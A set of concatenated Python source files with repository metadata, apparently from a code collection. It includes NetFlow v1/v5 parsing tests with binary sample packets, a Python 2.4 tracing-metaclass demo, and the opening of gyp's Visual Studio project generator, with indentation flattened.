('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('flags', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('pad2', 'H', 0),
('router_sc', 'I', 0),
)
# No support for v8 or v9 yet.
if __name__ == '__main__':
import unittest
class NetflowV1TestCase(unittest.TestCase):
sample_v1 = "\x00\x01\x00\x18gza<B\x00\xfc\x1c$\x93\x08p\xac\x01 W\xc0\xa8c\xf7\n\x00\x02\x01\x00\x03\x00\n\x00\x00\x00\x01\x00\x00\x02(gz7,gz7,\\\x1b\x00P\xac\x01\x11,\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x18S\xac\x18\xd9\xaa\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz7|gz7|\xd8\xe3\x00P\xac\x01\x06,\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x14\x18\xac\x18\x8d\xcd\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x05\xdcgz7\x90gz7\x90\x8a\x81\x17o\xac\x01\x066\x10\x00\x00\x00\x00\x04\x00\x03\xac\x0f'$\xac\x01\xe5\x1d\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz:8gz:8\xa3Q\x126\xac)\x06\xfd\x18\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x16E\xac#\x17\x8e\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz:Lgz:L\xc9\xff\x00P\xac\x1f\x06\x86\x02\x00\x00\x00\x00\x03\x00\x1b\xac\r\t\xff\xac\x01\x99\x95\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:Xgz:X\xee9\x00\x17\xac\x01\x06\xde\x10\x00\x00\x00\x00\x04\x00\x03\xac\x0eJ\xd8\xac\x01\xae/\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:hgz:h\xb3n\x00\x15\xac\x01\x06\x81\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01#8\xac\x01\xd9*\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:tgz:t\x00\x00\x83P\xac!\x01\xab\x10\x00\x00\x00\x00\x03\x00\x1b\xac\n`7\xac*\x93J\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:tgz:t\x00\x00\x00\x00\xac\x012\xa9\x10\x00\x00\x00\x00\x04\x00\x07\xac\nG\x1f\xac\x01\xfdJ\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x00(gz:\x88gz:\x88!\x99i\x87\xac\x1e\x06~\x02\x00\x00\x00\x00\x03\x00\x1b\xac\x01(\xc9\xac\x01B\xc4\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x00(gz:\x88gz:\x88}6\x00P\xac\x01\x06\xfe\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0b\x08\xe8\xac\x01F\xe2\xc0\xa82\x02\x00\x04\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz:\x9cgz:\x9c`ii\x87\xac\x01\x06;\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x1d$\xac<\xf0\xc3\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\x9cgz:\x9cF2\x00\x14\xac\x01\x06s\x18\x00\x00\x00\x00\x04\x00\x03\xac\x0b\x11Q\xac\x01\xde\x06\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xb0gz:\xb0\xef#\x1a+\xac)\x06\xe9\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0cR\xd9\xac\x01o\xe8\xc0\xa82\x02\x00\x04\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xc4gz:\xc4\x13n\x00n\xac\x19\x06\xa8\x10\x00\x00\x00\x00\x03\x00\x19\xac\x01=\xdd\xac\x01}\xee\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x00(gz:\xc4gz:\xc4\x00\x00\xdc\xbb\xac\x01\x01\xd3\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0f(\xd1\xac\x01\xcc\xa5\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xd8gz:\xd8\xc5s\x17o\xac\x19\x06#\x18\x00\x00\x00\x00\x03\x00\x07\xac\n\x85[\xc0\xa8cn\n\x00\x02\x01\x00\x04\x00\n\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xe4gz:\xe4\xbfl\x00P\xac\x01\x06\xcf\x10\x00\x00\x00\x00\x04\x00\x07\xac\x010\x1f\xac\x18!E\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x05\xdcgz;\x00gz;\x00\x11\x95\x04\xbe\xc0\xa8\x06\xea\x10\x00\x00\x00\x00\x03\x00\n\xac\x010\xb6\xac\x1e\xf4\xaa\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz;4gz;4\x88d\x00\x17\xac\x01\x06\x1f\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01#_\xac\x1e\xb0\t\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz;Hgz;H\x81S\x00P\xac \x06N\x10\x00\x00\x00\x00\x03\x00\x1b\xac\x01\x04\xd9\xac\x01\x94c\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz;\\gz;\\U\x10\x00P\xac\x01\x06P\x18\x00\x00\x00\x00\x04\x00\x1b\xac\x01<\xae\xac*\xac!\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x00\xfagz;\x84gz;\x84\x0c\xe7\x00P\xac\x01\x11\xfd\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x1f\x1f\xac\x17\xedi\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz;\x98gz;\x98\xba\x17\x00\x16\xac\x01\x06|\x10\x00\x00\x00\x00\x03\x00\x07"
def testPack(self):
pass
def testUnpack(self):
nf = Netflow1(self.sample_v1)
assert len(nf.data) == 24
#print repr(nfv1)
class NetflowV5TestCase(unittest.TestCase):
sample_v5 = '\x00\x05\x00\x1d\xb5\xfa\xc9\xd0:\x0bAB&Vw\xde\x9bsv1\x00\x01\x00\x00\xac\n\x86\xa6\xac\x01\xaa\xf7\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x81\x14\xb5\xfa\x81\x1452\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x91D\xac\x14C\xe4\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x9b\xbd\xb5\xfa\x9b\xbd\x00P\x85\xd7\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x17\xe2\xd7\xac\x01\x8cV\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfao\xb8\xb5\xfao\xb8v\xe8\x17o\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0e\xf2\xe5\xac\x01\x91\xb2\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x81\xee\xb5\xfa\x81\xee\xd0\xeb\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\nCj\xac)\xa7\t\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x85\x92\xb5\xfa\x85\x92\x8c\xb0\x005\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x96=\xac\x15\x1a\xa8\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x86\xe0\xb5\xfa\x86\xe0\xb4\xe7\x00\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01V\xd1\xac\x01\x86\x15\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa}:\xb5\xfa}:[Q\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac2\xf1\xb1\xac)\x19\xca\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x83\xc3\xb5\xfa\x83\xc3\x16,\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0cA4\xac\x01\x9az\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x8d\xa7\xb5\xfa\x8d\xa7\x173\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x1e\xd2\x84\xac)\xd8\xd2\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x8e\x97\xb5\xfa\x8e\x977*\x17o\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x85J\xac \x11\xfc\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x884\xb5\xfa\x884\xf5\xdd\x00\x8f\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x04\x80\xac<[n\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x9dr\xb5\xfa\x9drs$\x00\x16\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xb9J\xac"\xc9\xd7\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x90r\xb5\xfa\x90r\x0f\x8d\x00\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac*\xa3\x10\xac\x01\xb4\x19\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x92\x03\xb5\xfa\x92\x03pf\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xabo\xac\x1e\x7fi\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x93\x7f\xb5\xfa\x93\x7f\x00P\x0b\x98\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0c\n\xea\xac\x01\xa1\x15\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfay\xcf\xb5\xfay\xcf[3\x17\xe0\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xbb\xb3\xac)u\x8c\n\x00\x02\x01\x00i\x00\xdb\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x943\xb5\xfa\x943\x00P\x1e\xca\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0fJ`\xac\x01\xab\x94\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x87[\xb5\xfa\x87[\x9a\xd6/\xab\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac*\x0f\x93\xac\x01\xb8\xa3\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x89\xbb\xb5\xfa\x89\xbbn\xe1\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x93\xa1\xac\x16\x80\x0c\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x87&\xb5\xfa\x87&\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x83Z\xac\x1fR\xcd\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x90\r\xb5\xfa\x90\r\xf7*\x00\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0c\xe0\xad\xac\x01\xa8V\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x9c\xf6\xb5\xfa\x9c\xf6\xe5|\x1a+\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x1e\xccT\xac<x&\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x80\xea\xb5\xfa\x80\xea\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xbb\x18\xac\x01|z\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x88p\xb5\xfa\x88p\x00P\x0b}\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x17\x0er\xac\x01\x8f\xdd\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x89\xf7\xb5\xfa\x89\xf7\r\xf7\x00\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\n\xbb\x04\xac<\xb0\x15\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x90\xa9\xb5\xfa\x90\xa9\x9c\xd0\x00\x8f\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\nz?\xac)\x03\xc8\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfaue\xb5\xfaue\xee\xa6\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xb5\x05\xc0\xa8c\x9f\n\x00\x02\x01\x00i\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa{\xc7\xb5\xfa{\xc7\x00P\x86\xa9\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac2\xa5\x1b\xac)0\xbf\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x9bZ\xb5\xfa\x9bZC\xf9\x17\xe0\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def testPack(self):
pass
def testUnpack(self):
nf = Netflow5(self.sample_v5)
assert len(nf.data) == 29
#print repr(nfv5)
unittest.main()
| apache-2.0 |
scs/uclinux | user/python/python-2.4.4/Demo/metaclasses/Trace.py | 47 | 4133 | """Tracing metaclass.
XXX This is very much a work in progress.
"""
import types, sys
class TraceMetaClass:
"""Metaclass for tracing.
Classes defined using this metaclass have an automatic tracing
feature -- by setting the __trace_output__ instance (or class)
variable to a file object, trace messages about all calls are
written to the file. The trace formatting can be changed by
defining a suitable __trace_call__ method.
"""
__inited = 0
def __init__(self, name, bases, dict):
self.__name__ = name
self.__bases__ = bases
self.__dict = dict
# XXX Can't define __dict__, alas
self.__inited = 1
def __getattr__(self, name):
try:
return self.__dict[name]
except KeyError:
for base in self.__bases__:
try:
return base.__getattr__(name)
except AttributeError:
pass
raise AttributeError, name
def __setattr__(self, name, value):
if not self.__inited:
self.__dict__[name] = value
else:
self.__dict[name] = value
def __call__(self, *args, **kw):
inst = TracingInstance()
inst.__meta_init__(self)
try:
init = inst.__getattr__('__init__')
except AttributeError:
init = lambda: None
apply(init, args, kw)
return inst
__trace_output__ = None
class TracingInstance:
"""Helper class to represent an instance of a tracing class."""
def __trace_call__(self, fp, fmt, *args):
fp.write((fmt+'\n') % args)
def __meta_init__(self, klass):
self.__class = klass
def __getattr__(self, name):
# Invoked for any attr not in the instance's __dict__
try:
raw = self.__class.__getattr__(name)
except AttributeError:
raise AttributeError, name
if type(raw) != types.FunctionType:
return raw
# It's a function
fullname = self.__class.__name__ + "." + name
if not self.__trace_output__ or name == '__trace_call__':
return NotTracingWrapper(fullname, raw, self)
else:
return TracingWrapper(fullname, raw, self)
class NotTracingWrapper:
def __init__(self, name, func, inst):
self.__name__ = name
self.func = func
self.inst = inst
def __call__(self, *args, **kw):
return apply(self.func, (self.inst,) + args, kw)
class TracingWrapper(NotTracingWrapper):
def __call__(self, *args, **kw):
self.inst.__trace_call__(self.inst.__trace_output__,
"calling %s, inst=%s, args=%s, kw=%s",
self.__name__, self.inst, args, kw)
try:
rv = apply(self.func, (self.inst,) + args, kw)
except:
t, v, tb = sys.exc_info()
self.inst.__trace_call__(self.inst.__trace_output__,
"returning from %s with exception %s: %s",
self.__name__, t, v)
raise t, v, tb
else:
self.inst.__trace_call__(self.inst.__trace_output__,
"returning from %s with value %s",
self.__name__, rv)
return rv
Traced = TraceMetaClass('Traced', (), {'__trace_output__': None})
def _test():
global C, D
class C(Traced):
def __init__(self, x=0): self.x = x
def m1(self, x): self.x = x
def m2(self, y): return self.x + y
__trace_output__ = sys.stdout
class D(C):
def m2(self, y): print "D.m2(%r)" % (y,); return C.m2(self, y)
__trace_output__ = None
x = C(4321)
print x
print x.x
print x.m1(100)
print x.m1(10)
print x.m2(33)
print x.m1(5)
print x.m2(4000)
print x.x
print C.__init__
print C.m2
print D.__init__
print D.m2
y = D()
print y
print y.m1(10)
print y.m2(100)
print y.x
if __name__ == '__main__':
_test()
| gpl-2.0 |
alexcrichton/gyp | pylib/gyp/generator/msvs.py | 5 | 123465 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSUtil as MSVSUtil
import gyp.MSVSVersion as MSVSVersion
from gyp.common import GypError
# TODO: Remove once bots are on 2.7, http://crbug.com/241769
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import gyp.ordered_dict
return gyp.ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
VALID_MSVS_GUID_CHARS = re.compile('^[A-F0-9\-]+$')
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '.exe',
'STATIC_LIB_PREFIX': '',
'SHARED_LIB_PREFIX': '',
'STATIC_LIB_SUFFIX': '.lib',
'SHARED_LIB_SUFFIX': '.dll',
'INTERMEDIATE_DIR': '$(IntDir)',
'SHARED_INTERMEDIATE_DIR': '$(OutDir)obj/global_intermediate',
'OS': 'win',
'PRODUCT_DIR': '$(OutDir)',
'LIB_DIR': '$(OutDir)lib',
'RULE_INPUT_ROOT': '$(InputName)',
'RULE_INPUT_DIRNAME': '$(InputDir)',
'RULE_INPUT_EXT': '$(InputExt)',
'RULE_INPUT_NAME': '$(InputFileName)',
'RULE_INPUT_PATH': '$(InputPath)',
'CONFIGURATION_NAME': '$(ConfigurationName)',
}
# The msvs specific sections that hold paths
generator_additional_path_sections = [
'msvs_cygwin_dirs',
'msvs_props',
]
generator_additional_non_configuration_keys = [
'msvs_cygwin_dirs',
'msvs_cygwin_shell',
'msvs_large_pdb',
'msvs_shard',
'msvs_external_builder',
'msvs_external_builder_out_dir',
'msvs_external_builder_build_cmd',
'msvs_external_builder_clean_cmd',
]
# List of precompiled header related keys.
precomp_keys = [
'msvs_precompiled_header',
'msvs_precompiled_source',
]
cached_username = None
cached_domain = None
# Based on http://code.activestate.com/recipes/576694/.
class OrderedSet(collections.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def discard(self, key):
if key in self.map:
key, prev, next = self.map.pop(key)
prev[2] = next
next[1] = prev
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[key] = [key, curr, end]
def update(self, iterable):
for i in iterable:
if i not in self:
self.add(i)
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
if sys.platform not in ('win32', 'cygwin'):
return ('DOMAIN', 'USERNAME')
global cached_username
global cached_domain
if not cached_domain or not cached_username:
domain = os.environ.get('USERDOMAIN')
username = os.environ.get('USERNAME')
if not domain or not username:
call = subprocess.Popen(['net', 'config', 'Workstation'],
stdout=subprocess.PIPE)
config = call.communicate()[0]
username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
username_match = username_re.search(config)
if username_match:
username = username_match.group(1)
domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
domain_match = domain_re.search(config)
if domain_match:
domain = domain_match.group(1)
cached_domain = domain
cached_username = username
return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
source: The path to be normalize.d
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
def _FixPath(path):
"""Convert paths to a form that will make sense in a vcproj file.
Arguments:
path: The path to convert, may contain / etc.
Returns:
The path with all slashes made into backslashes.
"""
if fixpath_prefix and path and not os.path.isabs(path) and not path[0] == '$':
path = os.path.join(fixpath_prefix, path)
path = path.replace('/', '\\')
path = _NormalizedSource(path)
if path and path[-1] == '\\':
path = path[:-1]
return path
def _FixPaths(paths):
"""Fix each of the paths of the list."""
return [_FixPath(i) for i in paths]
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
list_excluded=True):
"""Converts a list split source file paths into a vcproj folder hierarchy.
Arguments:
sources: A list of source file paths split.
prefix: A list of source file path layers meant to apply to each of sources.
excluded: A set of excluded files.
Returns:
A hierarchy of filenames and MSVSProject.Filter objects that matches the
layout of the source tree.
For example:
_ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
prefix=['joe'])
-->
[MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
"""
if not prefix: prefix = []
result = []
excluded_result = []
# Gather files into the final result, excluded, or folders.
for s in sources:
if len(s) == 1:
filename = _NormalizedSource('\\'.join(prefix + s))
if filename in excluded:
excluded_result.append(filename)
else:
result.append(filename)
else:
contents = _ConvertSourcesToFilterHierarchy([s[1:]], prefix + [s[0]],
excluded=excluded,
list_excluded=list_excluded)
contents = MSVSProject.Filter(s[0], contents=contents)
result.append(contents)
# Add a folder for excluded files.
if excluded_result and list_excluded:
excluded_folder = MSVSProject.Filter('_excluded_files',
contents=excluded_result)
result.append(excluded_folder)
return result
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
if not value: return
_ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset)
def _ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset=False):
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list and type(value) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name) - 1]
else:
return config_name
def _ConfigFullName(config_name, config_data):
platform_name = _ConfigPlatform(config_data)
return '%s|%s' % (_ConfigBaseName(config_name, platform_name), platform_name)
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, has_input_path,
quote_cmd, do_setup_env):
if [x for x in cmd if '$(InputDir)' in x]:
input_dir_preamble = (
'set INPUTDIR=$(InputDir)\n'
'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
'set INPUTDIR=%INPUTDIR:~0,-1%\n'
)
else:
input_dir_preamble = ''
if cygwin_shell:
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Prepare command.
direct_cmd = cmd
direct_cmd = [i.replace('$(IntDir)',
'`cygpath -m "${INTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(OutDir)',
'`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(InputDir)',
'`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
if has_input_path:
direct_cmd = [i.replace('$(InputPath)',
'`cygpath -m "${INPUTPATH}"`')
for i in direct_cmd]
direct_cmd = ['\\"%s\\"' % i.replace('"', '\\\\\\"') for i in direct_cmd]
# direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
direct_cmd = ' '.join(direct_cmd)
# TODO(quote): regularize quoting path names throughout the module
cmd = ''
if do_setup_env:
cmd += 'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
cmd += 'set CYGWIN=nontsec&& '
if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
if direct_cmd.find('INTDIR') >= 0:
cmd += 'set INTDIR=$(IntDir)&& '
if direct_cmd.find('OUTDIR') >= 0:
cmd += 'set OUTDIR=$(OutDir)&& '
if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
cmd += 'set INPUTPATH=$(InputPath) && '
cmd += 'bash -c "%(cmd)s"'
cmd = cmd % {'cygwin_dir': cygwin_dir,
'cmd': direct_cmd}
return input_dir_preamble + cmd
else:
# Convert cat --> type to mimic unix.
if cmd[0] == 'cat':
command = ['type']
else:
command = [cmd[0].replace('/', '\\')]
# Add call before command to ensure that commands can be tied together one
# after the other without aborting in Incredibuild, since IB makes a bat
# file out of the raw command string, and some commands (like python) are
# actually batch files themselves.
command.insert(0, 'call')
# Fix the paths
# TODO(quote): This is a really ugly heuristic, and will miss path fixing
# for arguments like "--arg=path" or "/opt:path".
# If the argument starts with a slash or dash, it's probably a command line
# switch
arguments = [i if (i[:1] in "/-") else _FixPath(i) for i in cmd[1:]]
arguments = [i.replace('$(InputDir)', '%INPUTDIR%') for i in arguments]
arguments = [MSVSSettings.FixVCMacroSlashes(i) for i in arguments]
if quote_cmd:
# Support a mode for using cmd directly.
# Convert any paths to native form (first element is used directly).
# TODO(quote): regularize quoting path names throughout the module
arguments = ['"%s"' % i for i in arguments]
# Collapse into a single command.
return input_dir_preamble + ' '.join(command + arguments)
def _BuildCommandLineForRule(spec, rule, has_input_path, do_setup_env):
# Currently this weird argument munging is used to duplicate the way a
# python script would need to be run as part of the chrome tree.
# Eventually we should add some sort of rule_default option to set this
# per project. For now the behavior chrome needs is the default.
mcs = rule.get('msvs_cygwin_shell')
if mcs is None:
mcs = int(spec.get('msvs_cygwin_shell', 1))
elif isinstance(mcs, str):
mcs = int(mcs)
quote_cmd = int(rule.get('msvs_quote_cmd', 1))
return _BuildCommandLineForRuleRaw(spec, rule['action'], mcs, has_input_path,
quote_cmd, do_setup_env=do_setup_env)
def _AddActionStep(actions_dict, inputs, outputs, description, command):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
command: command line to execute
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
if chosen_input not in actions_dict:
actions_dict[chosen_input] = []
actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
inputs, outputs, description, cmd):
"""Add a custom build tool to execute something.
Arguments:
p: the target project
spec: the target project dict
primary_input: input file to attach the build tool to
inputs: list of inputs
outputs: list of outputs
description: description of the action
cmd: command line to execute
"""
inputs = _FixPaths(inputs)
outputs = _FixPaths(outputs)
tool = MSVSProject.Tool(
'VCCustomBuildTool',
{'Description': description,
